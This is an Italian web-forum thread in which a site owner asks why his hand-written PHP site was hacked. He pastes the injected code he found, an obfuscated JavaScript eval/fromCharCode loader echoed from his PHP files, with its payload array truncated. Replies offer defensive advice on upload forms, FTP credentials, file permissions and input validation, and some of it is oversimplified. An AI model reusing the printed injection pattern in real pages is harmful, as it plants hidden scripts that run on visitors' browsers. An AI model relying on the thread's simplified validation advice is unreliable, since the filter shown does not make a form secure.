sito hackerato #8f4d8e#

[Fumocamel]

salve,
ho un sito che è stato bucato e trovo nei file php il seguente script

Codice PHP:

#8f4d8e# echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,ecc...);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>"; #/8f4d8e# 


non riesco proprio a capire chi scrive sui file php
c'è una form con la possibilità di fare upload ma c'è un controllo dei file inviati

[homerbit]

se l'unico punto di accesso è il form, allora, a parte potenziali bug del server, è lui il primo ad essere sospettato.
Ma hai dato a disposizione poche notizie infatti sarebbe di grande aiuto conoscere la struttura del sito, se è un cms, se è uno script scaricato da qualche parte, versione del php, tipo di query (se esistono) utilizzate, se ha un template personalizzabile via backend, ecc ecc.

Il bug purtroppo può insediarsi ovunque.

[Fumocamel]

grazie
quello che non riesco a capire e come sono entrati...

il server non lo gestisco io e quindi non ho nemmeno l'accesso

purtroppo non accesso nemmeno ai log

i sito è scritto in php da me, niente cms

ho nella form ho disabilitato l'upload del file...

[homerbit]

se hai solo il form, disabilita temporaneamente l'upload (magari lo controlli con calma) poi potresti anche tener traccia di chi prova a compilarlo creando un file di log
Disabilita i permessi di scrittura a tutti i files e cartelle che devono essere acceduti solo in lettura. Prova anche a sentire il provider.

[Nobody33]

Per rendere sicuro un form, basta inserire degli opportuni controlli per l'inserimento dati nei campi, cosi vai sul sicuro.

Esempio (per farlo proprio stretto):

codice:

preg_replace("/[^A-Za-z0-9]/", "", $il_tuo_campo)

Se ti va, posta il codice

saluti

[boots]

Secondo me, in questi casi sono riusciti ad avere accesso via ftp: o ti hanno rubato le password o bucato il server ftp del provider.

Di solito il proprietario dei file/cartelle non è lo stesso che fa "girare" il server web, in questo modo anche eseguendo codice malevolo questi non può modificare i file presenti.

Discorso diverso se hai dato i permessi di scrittura ai tuoi file

[Fumocamel]

il controllo iniziale del form lo faccio via js

il preg_replace dovrei metterlo nella action della form?

grazie

[Fumocamel]

Originariamente inviato da boots
Secondo me, in questi casi sono riusciti ad avere accesso via ftp: o ti hanno rubato le password o bucato il server ftp del provider.

Di solito il proprietario dei file/cartelle non è lo stesso che fa "girare" il server web, in questo modo anche eseguendo codice malevolo questi non può modificare i file presenti.

Discorso diverso se hai dato i permessi di scrittura ai tuoi file

ad esempio modificano il .htaccess che ha 0644 come diritti...
anche io credo che abbiano bucato il server o hanno avuto accesso al ftp...
infatti ho chiesto la modifica della password al provider... ma non ho ancora avuto risposta

grazie

[homerbit]

Originariamente inviato da Fumocamel
il controllo iniziale del form lo faccio via js

il preg_replace dovrei metterlo nella action della form?

grazie

questo tuo messaggio mi fa pensare....
pensare che il codice non sia sicuro, quindi ti consiglio, se ti va, di postare qui le sezioni di codice che inseriscono valori in files e db. In poche parole cosa c'è oltre al form? Come validi questo form? Altrimenti non ne esci.
Cmq il preg_replace suggeritoti è un filtro sul valore insertio nel campo del form sia che esso provenga da $_POST (come in questo caso) che da $_GET

[Nobody33]

Non puoi mai fare un controllo di un form PHP con il solo JS.

Basterebbe disabilitare JS e il controllo non esiste più.

JS, jquery e tutte queste cose non sono proprio essenziali; fanno "bella scena", bei effetti ma nulla di più.

Dove devi mettere i controlli php, dipende tutto com'è strutturato il tuo formulario.

infatti ho chiesto la modifica della password al provider... ma non ho ancora avuto risposta

Ma dove stai? La password ed il nome te la puoi modificare in ogni momento tu stesso.
Se cosi non è, cambia hosting al volo.

qualunque password dovrebbe contenere SEMPRE caratteri speciali, numeri, lettere e di tutto e di più.

Esempio: $&qualDcome$568££

Saluti